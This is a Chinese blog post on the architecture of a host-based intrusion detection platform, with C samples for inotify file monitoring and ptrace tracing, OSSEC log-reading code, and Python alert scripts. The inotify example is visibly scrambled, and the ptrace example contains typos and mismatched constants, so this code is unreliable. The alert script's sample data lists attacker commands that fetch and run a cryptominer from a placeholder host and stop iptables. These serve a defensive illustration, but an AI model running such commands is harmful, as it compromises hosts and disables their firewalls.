广告位招租
安全部门确实是消防队的,但至少有一部分应该是检查灭火器位置放没放对且是否失效,报警装置能不能用。如果一个消防队全是外勤,那么可能就真的跟《全境封锁》里面的消防队一样了。——题记
这两天摊上了个头痛的问题,如何去做基于主机端的入侵检测,结果我在翻github的时候遇到一个OSSIM下面的一个OSSIC HIDS平台,是趋势科技开出来的,于是便研究了一下。但是由于本人C++很弱(确切来说是编程能力很弱,曾经被某面试官喷不懂for循环),所以我决定自己研究下这个东西到底是啥。
p.s. 这个也是我去年去滴滴面试的时候面试官问我的问题,当时因为自己比较菜,所以没回答全,但是今年由于自己有了对这些东西的理解,算是可以写出点东西来。
答曰:有用,用处在于更好地监控服务器的状态。
HIDS平台建设其实分为三大部分:终端Agent监控组件,Dashboard控制面板和与SIEM、运维数据等其他平台对接的接口集合。
终端Agent组件:可以简单理解为就是一个后门(他真的是一个后门),主要作用包括:监控文件变更、监控服务器状态、下发一些操作指令等。
DashBoard:用来执行一些策略推送、资源管理方面的操作
MQ && Servers:用来做负载均衡并吞吐数据到数据库
Database:数据库
SIEM APIs:用来将HIDS的数据和SIEM做整合
具体的话就上个图吧:
粗略的画了个架构,如下图:
先来说一下想法:终端Agent通过对业务IT资产文件的监控可以发现一些潜在威胁的文件或者是被人中的webshell后门,也可以记录和发现文件改动。同时终端Agent肩负着把日志摆渡到数据库的工作,方便运维人员对日志进行检索,进行终端日志的统一化收集管理。这个时候Agent的工作已经结束了,Agent需要的操作通过消息队列(这里技术选型可以考虑memcached/redis/kafka等组件,需根据自身需求做决定,图片中选择kafka)和负载均衡把数据传到Agent Server Cluster中,之后Server中的数据写入MongoDB的数据库集群做的储存,到这里完成了数据的保存工作。接下来进行第二阶段的工作也就是数据分析,首先需要从MongoDB集群中读取数据放到Spark中进行分析,但是在入Spark之前需要使用Kafka进行数据清洗,防止畸形数据进入分析,分析完了之后使用ElasticSearch集群进行日志的检索,最后导入DashBoard进行可视化展示,除此之外,在经历过ES集群之后,也可以直接接入TensorFlow分析一些看似正常的行为是不是攻击(这里需要大量的模型提交到TensorFlow进行学习训练,才能投入,如果没这个条件可以在前面Spark中做攻击行为的正则),最后提交到DashBoard做威胁可视化展示。第三部分就是Agent命令分发,这里安全运营工程师通过DashBoard直接向Agent批量下发命令,中间需要经过消息队列(也就是Kafka)进行任务的分发,完成批量的策略部署。
实际上Agent这边需要一个比较大的权限,而且Agent端其实就是一个权限很大的后门,通过上面的架构,我们大概能看出来Agent主要的作用有五个:文件监控、进程/任务监控、日志摆渡、策略推送和补丁推送,Agent这边的东西其实越轻量化越好,由于性能等诸多因素限制,Agent端不能占用太多的计算资源,在设置时要注意资源红线的设计,所以建议用C/C++开发。
文件监控这部分其实相对容易实现,这部分主要监测设备插入和拔出以及业务系统文件监控,这里需要说到一个小东西:inortify。inotify 是一种文件系统的变化通知机制,如文件增加、删除等事件可以立刻让用户态得知,该机制是著名的桌面搜索引擎项目 beagle 引入的,并在 Gamin 等项目中被应用。
inortify具体的代码原理和实现我就不说了,这里先用一个简单的C代码去实现一个简单的文件监控:
#include <linux/unistd.h>
#include <linux/inotify.h>
#include <errno.h>
_syscall0(int, inotify_init)
_syscall3(int, inotify_add_watch, int, fd, const char *, path, __u32, mask)
_syscall2(int, inotify_rm_watch, int, fd, __u32, mask)
char * monitored_files[] = {
"./tmp_file",
"./tmp_dir",
"/mnt/sda3/windows_file"
};
struct wd_name {
int wd;
char * name;
};
#define WD_NUM 3
struct wd_name wd_array[WD_NUM];
char * event_array[] = {
"File was accessed",
"File was modified",
"File attributes were changed",
"writtable file closed",
"Unwrittable file closed",
"File was opened",
"File was moved from X",
"File was moved to Y",
"Subfile was created",
"Subfile was deleted",
"Self was deleted",
"Self was moved",
"",
"Backing fs was unmounted",
"Event queued overflowed",
"File was ignored"
};
#define EVENT_NUM 16
#define MAX_BUF_SIZE 1024
int main(void)
{
int fd;
int wd;
char buffer[1024];
char * offset = NULL;
struct inotify_event * event;
int len, tmp_len;
char strbuf[16];
int i = 0;
fd = inotify_init();
if (fd < 0) {
printf("Fail to initialize inotify.\n");
exit(-1);
}
for (i=0; i<WD_NUM; wd="inotify_add_watch(fd," add (event- if { len) < buffer) - *)event (((char while *)buffer; inotify_event event len); len='%d.\n",' happens, printf(?Some offset="buffer;" MAX_BUF_SIZE)) buffer, while(len="read(fd," } wd_array[i].wd="wd;" exit(-1); wd_array[i].name); %s.\n?, for watch printf(?Can?t 0) (wd IN_ALL_EVENTS); wd_array[i].name, wd_array[i].name="monitored_files[i];" i++)>mask & IN_ISDIR) {
memcpy(strbuf, "Direcotory", 11);
}
else {
memcpy(strbuf, "File", 5);
}
printf("Object type: %s\n", strbuf);
for (i=0; iwd != wd_array[i].wd) continue;
printf("Object name: %s\n", wd_array[i].name);
break;
}
printf("Event mask: %08X\n", event->mask);
for (i=0; imask & (1<len;
event = (struct inotify_event *)(offset + tmp_len);
offset += tmp_len;
}
}
}
其实进程监控有很多种方法,比如说:
对于进程监控来说,第一种方法比较容易实现,第三种方法如果系统出于安全考虑,设置禁用了一些insmod,这样的话就不太好办了
ptrace的原型是这样的:
#include<sys/ptrace>
long int ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data)
这里面有四个参数,其中,request决定ptrace做什么,pid是被跟踪进程的ID,data存储从进程空间偏移量为addr的地方开始将被读取/写入的数据。
我们还是写一段代码来当注释看吧:
#include <stdio.h>
#include <stdlib.h>
#include <singal.h>
#include <syscall.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
int main(void)
{
long long counter = 0;
int wait_val;
int pid;
put("elknot@360corpsec says: Wait a Moment");
switch(pid=fork())
{
case -1: perror("fork");break;
case 0: {
ptrace(PTRACE_TRACEME, 0, 0, 0);
excel("/bin/ls", "ls", NULL);
break;
}
default: {
wait(&wait_val);
while(wait_val == 1047)
{
counter++
if(ptrace(PTRACE_SINGLESTEP, pid, 0, 0) != 0)
perror("ptrace");
wait(&wait_val);
}
}
printf("Number of Machine instructions: %lld\n", counter);
return 0;
}
}
这个例子的意思是:开始的时候子进程开始运行,调用exec后移花栽木,这时子进程的原进程(也就是未调用exec之前的进程)因为要被杀死了,会向父进程发送一个SIGTRAP信号。父进程此刻一直阻塞等待(也就是第一条wait(&wait_val);语句)。当父进程捕获到SIGTRAP信号,这个时候知道子进程已经结束了。此时,父进程通过request值为PTRACE_SINGLESTEP的ptrace调用来告诉操作系统重新唤醒子进程,但是在每条机器指令运行之后暂停。紧接着,父进程阻塞等待子进程暂停(wait_val == 1407等价于WIFSTOPPED(wait_val))并计数。子进程结束(这里不是暂停,对应的是WIFEXITED)后,父进程跳出loop循环。
进程监控大概就是这么个思路,这里可以参考:https://www.cnblogs.com/mooreliu/p/4850017.html,这段代码来自于这里。
所谓日志摆渡指的是通过Agent在终端将终端里面的日志导出至Agent服务端,然后由控制台进行检索。
这里我们先来以Linux操作系统为例,说一下需要摆渡的日志:
系统日志:
/var/log/boot.log:录了系统在引导过程中发生的事件,就是Linux系统开机自检过程显示的信息
/var/log/lastlog :记录最后一次用户成功登陆的时间、登陆IP等信息
/var/log/messages :记录Linux操作系统常见的系统和服务错误信息
/var/log/secure :Linux系统安全日志,记录用户和工作组变坏情况、用户登陆认证情况
/var/log/btmp :记录Linux登陆失败的用户、时间以及远程IP地址
/var/log/syslog:只记录警告信息,常常是系统出问题的信息,使用lastlog查看
/var/log/wtmp:该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件,使用last命令查看
/var/run/utmp:该日志文件记录有关当前登录的每个用户的信息。如 who、w、users、finger等就需要访问这个文件
连接时间日志:
/var/log/wtmp
/var/run/utmp
注:这里的日志不能直接用cat命令查看,可以通过w/who/finger/id/last/lastlog/ac进行查看
web服务器日志:
/var/log/nginx:Nginx日志默认位置
$TOMCAT_HOME\logs:Tomcat日志位置
/usr/local/apache/logs/access_log:Apache日志位置
/usr/local/apache2/logs:Apache2日志位置
通过将这些日志通过摆渡的方式放至Agent服务器,即可实现对终端关键日志的检索,例如我们可以使用fliebeat的方式通过Logstash收集日志,然后通过ES做检索,但是Logstash是不太适合Agent操作的,原因你懂的。读取日志的时候,可以用下面的函数去读取,以OSSEC下读取syslog为例:
void *read_syslog(int pos, int *rc, int drop_it)
{
int __ms = 0;
char *p;
char str[OS_MAXSTR + 1];
fpos_t fp_pos;
str[OS_MAXSTR] = '\0';
*rc = 0;
/* Get initial file location */
fgetpos(logff[pos].fp, &fp_pos);
while (fgets(str, OS_MAXSTR - OS_LOG_HEADER, logff[pos].fp) != NULL) {
/* Get the last occurrence of \n */
if ((p = strrchr(str, '\n')) != NULL) {
*p = '\0';
}
/* If we didn't get the new line, because the
* size is large, send what we got so far.
*/
else if (strlen(str) >= (OS_MAXSTR - OS_LOG_HEADER - 2)) {
/* Message size > maximum allowed */
__ms = 1;
} else {
/* Message not complete. Return. */
debug1("%s: Message not complete. Trying again: '%s'", ARGV0, str);
fsetpos(logff[pos].fp, &fp_pos);
break;
}
#ifdef WIN32
if ((p = strrchr(str, '\r')) != NULL) {
*p = '\0';
}
/* Look for empty string (only on Windows) */
if (strlen(str) <= 2) {
fgetpos(logff[pos].fp, &fp_pos);
continue;
}
/* Windows can have comment on their logs */
if (str[0] == '#') {
fgetpos(logff[pos].fp, &fp_pos);
continue;
}
#endif
debug2("%s: DEBUG: Reading syslog message: '%s'", ARGV0, str);
/* Send message to queue */
if (drop_it == 0) {
if (SendMSG(logr_queue, str, logff[pos].file,
LOCALFILE_MQ) < 0) {
merror(QUEUE_SEND, ARGV0);
if ((logr_queue = StartMQ(DEFAULTQPATH, WRITE)) < 0) {
ErrorExit(QUEUE_FATAL, ARGV0, DEFAULTQPATH);
}
}
}
/* Incorrect message size */
if (__ms) {
// strlen(str) >= (OS_MAXSTR - OS_LOG_HEADER - 2)
// truncate str before logging to ossec.log
#define OUTSIZE 4096
char buf[OUTSIZE + 1];
buf[OUTSIZE] = '\0';
snprintf(buf, OUTSIZE, "%s", str);
merror("%s: Large message size(length=%d): '%s...'", ARGV0, (int)strlen(str), buf);
while (fgets(str, OS_MAXSTR - 2, logff[pos].fp) != NULL) {
/* Get the last occurrence of \n */
if (strrchr(str, '\n') != NULL) {
break;
}
}
__ms = 0;
}
fgetpos(logff[pos].fp, &fp_pos);
continue;
}
return (NULL);
}
我们如果对服务器进行大批量的操作的时候,一个一个ssh上去显然是不现实的,所以这里可以利用Agent做策略推送,诸如修改防火墙策略。其实这里就类似于写一个后门,用Rootkit实现比较靠谱。由于众所周知的原因,这里我就不放代码了。
如何保证Agent正确运行于服务器上,这里就存在一个Agent存活性检测的问题,OSSEC这里其实提供了monitor_agents()函数用来监控Agent的状态,代码如下:
void monitor_agents()
{
char **cr_agents;
char **av_agents;
av_agents = get_agents_with_timeout(GA_ACTIVE, mond.notify_time);
/* No agent saved */
if (!mond.agents) {
mond.agents = av_agents;
return;
}
/* Check if any of the previously available agents are disconnected */
cr_agents = mond.agents;
while (*cr_agents) {
int available = 0;
char **tmp_av;
tmp_av = av_agents;
while (tmp_av && *tmp_av) {
if (strcmp(*cr_agents, *tmp_av) == 0) {
available = 1;
break;
}
tmp_av++;
}
/* Agent disconnected */
if (available == 0) {
char str[OS_SIZE_1024 + 1];
/* Send disconnected message */
snprintf(str, OS_SIZE_1024 - 1, OS_AG_DISCON, *cr_agents);
if (SendMSG(mond.a_queue, str, ARGV0,
LOCALFILE_MQ) < 0) {
merror(QUEUE_SEND, ARGV0);
}
}
cr_agents++;
}
/* Remove old agent list and add current one */
free_agents(mond.agents);
mond.agents = av_agents;
return;
}
p.s. 先暂时想到这么多吧,其他的由于众所周知的原因不太好网上写。
前面Agent写的差不多了,但是由于我们要统一进数据库方便后面Spark的分析、TensorFlow的机器学习和ES的检索以及DashBoard的输出,我们必须得把数据结构统一化才可以,数据结构的统一化其实是一个比较麻烦的事儿,一般情况下我们可以将数据结构设置为如下,以方便检索(有用众所周知的原因,这事儿不能说太细):
{
"type": "agent_log",
"data":
{
"agent_id":"e84c3f67464b7d3358a99bc232a6761a",
"server_ip":"192.168.1.101",
"server_mac":"00-00-00-00-00-00",
"server_tag":"nginx-01-payment",
"server_log":
{
"log_type":"syslog",
"log_path":"/var/log/system.log",
"log_time":"2017-12-06 1:00:00",
"log_user":"bogon"
"log_data":"com.apple.xpc.launchd[1] (com.apple.preference.displays.MirrorDisplays)",
"mailious_tag": "FALSE"
}
}
}
这样的话将日志存放到数据库中,我们可以直接进行分析和检索,而且JSON的好处显而易见。
这一部分主要是把Agent的数据进行可视化输出,这里输出的话都集中在DashBoard,如果DashBoard只需要做数据分析的话,可以不用Django/Flask这种去做一个轻量化的后台管理界面,只需要用Kibana进行数据和可视化展示。
数据可视化这部分着重在强调突出异常数据的展示和潜在风险,以方便安全运营工程师及时排查终端的问题,同时可以很方便去做健康度检测和监视。
另外一点就是推送Agent紧急情况的信息,主流的推送方式包括邮件、微信、短信,但是根据实际应用的情况来看,建议优先考虑邮件,其次考虑微信,最后考虑短信。邮件更方便于取证和存档,微信重在及时性。邮件推送的话可以简单利用Python脚本来实现:
# Written By Jeremy Li of Qihoo 360 ESG
#coding: utf-8
import smtplib
from email.mime.text import MIMEText
from email.utils import formataddr
# Dangerous Command Mark
marked_tag = "style=color:#F00"
#[config]
my_sender = 'YOUR_MAILPUSH'
sender_password = 'YOUR_PASSWORD'
my_user = '[email protected]'
attacker_ip = "192.168.1.1"
#Sample Behavior
attack_behavior = [
{
"type":"mal_command",
"data":"root@honeynet-01# wget http://xx.xx.xx.xx/xmr"
},
{
"type":"mal_command",
"data":"root@honeynet-01# service iptables stop"
},
{
"type":"mal_command",
"data":"root@honeynet-01# ./xmr &"
}
]
yara_rule = "ELF.BitMiner"
smtp_host = 'MAIL_ISP'
smtp_port = 0
def mail_content():
content = "<p>Hi elknot@360corpsec:</p><br>"
content += "<br>"
content += "<p>Your Server is being attacked by "+ attacker_ip + " </p><br>"
content += "<p>Attack Behavior:<p><br>"
for i in range(len(attack_behavior)):
content += "<p " + marked_tag + ">" + attack_behavior[i] + "<p><br>"
content += "<br>"
content += "<p>Attack Concerned:</p><br>"
content += "<p " + marked_tag + ">" + yara_rule + "</p>"
content += "<br>"
return content
def mail():
ret = True
try:
text = mail_content()
msg = MIMEText(text,'html','utf-8')
msg['From'] = formataddr(['BI Tracker', my_sender])
msg['To'] = formataddr(['elknot@360corpsec', my_user])
msg['Subject'] = 'HoneyPot is over Attacked!'
print msg
smtp = smtplib.SMTP(smtp_host, smtp_port)
smtp.set_debuglevel(True)
smtp.starttls()
smtp.login(my_sender, sender_password)
smtp.sendmail(my_sender, my_user, msg.as_string())
smtp.close()
except smtplib.SMTPException as e:
print e
ret = False
return ret
ret = mail()
if ret:
print("ok")
else:
print("failed")
这样就完成了一个简单的邮件通知,这里需要注意邮件服务配置的问题,防止敏感信息泄露。比如下面这个图,其实这个是自己弄的一个基于Agent+Server模式的蜜罐推送的邮件(有时间再说)。
微信的话,在github上有个开源的wxBot,可以用作微信通知:
#!/usr/bin/env python
# coding: utf-8
from wxbot import *
class MyWXBot(WXBot):
def handle_msg_all(self, msg):
if msg['msg_type_id'] == 4 and msg['content']['type'] == 0:
self.send_msg_by_uid(u'hi', msg['user']['id'])
#self.send_img_msg_by_uid("img/1.png", msg['user']['id'])
#self.send_file_msg_by_uid("img/1.png", msg['user']['id'])
def schedule(self):
self.send_msg(u'elknot@360corpsec', u'Hi,Boss!')
time.sleep(1)
def main():
bot = MyWXBot()
bot.DEBUG = True
bot.conf['qr'] = 'png'
bot.run()
if __name__ == '__main__':
main()
在检索之前,应该将数据库中的信息进行清洗后才能放入Spark做数据分析,当然也跟某大佬交换过意见,意见是,TensorFlow那里其实也可以放到Spark那部分去做,因为在Spark里面分析的时候直接将受影响的命令标红就OK了,但是跟据我的经验来看,有一些多一层TensorFlow的目的在于区分一些看起来不像是攻击的攻击,或者是去区分扫描器和真人攻击,再或者。。。(众所周知的原因)。在检索的时候,可以使用gc或者是t调整lucene cache为filter cache来为ES做优化,检索资源优化产生的原因是因为Lucene索引的时候只能一个线程工作,而且lucene会根据索引段合并去提高查询的效率,如果数据量过大,合并操作会浪费大量时间,造成数据会挤压在内存里。
具体怎么样检索或者是如何检索,由于众所周知的原因大家看着来吧。
HIDS平台作为内网安全设施的一部分,势必要进行日志集中化管理,之前也说过,如果日志源过多,就必须要要做日志集中化管理,也就是传说当中的上SIEM。所以HIDS要留出来API去让SIEM检索当前的日志,这里我们就一切从简的来一个SIEM,同时结合情报做自查。
说一下流程,HIDS中的数据通过前置Agent(和HIDS Agent不是一回事)将日志摆渡到SIEM的Log Collector(日志收集器)中,然后配合情报数据进行检索,检查日志中是否有与情报匹配的Server,如果有,则通过Agent向HIDS的消息队列里面推送任务进行操作(比如说利用YARA规则匹配是否真正为中招的文件)。
由于众所周知的原因,这篇文章里面的东西不能够直接作为HIDS去用,暂且算是为大家提供一种思路吧,如果有异议者欢迎在群里与我讨论,我定会一一回答。
顺便打个广告,360观星实验室常年招人,欢迎各位投简历,简历请发送至[email protected]或者[email protected]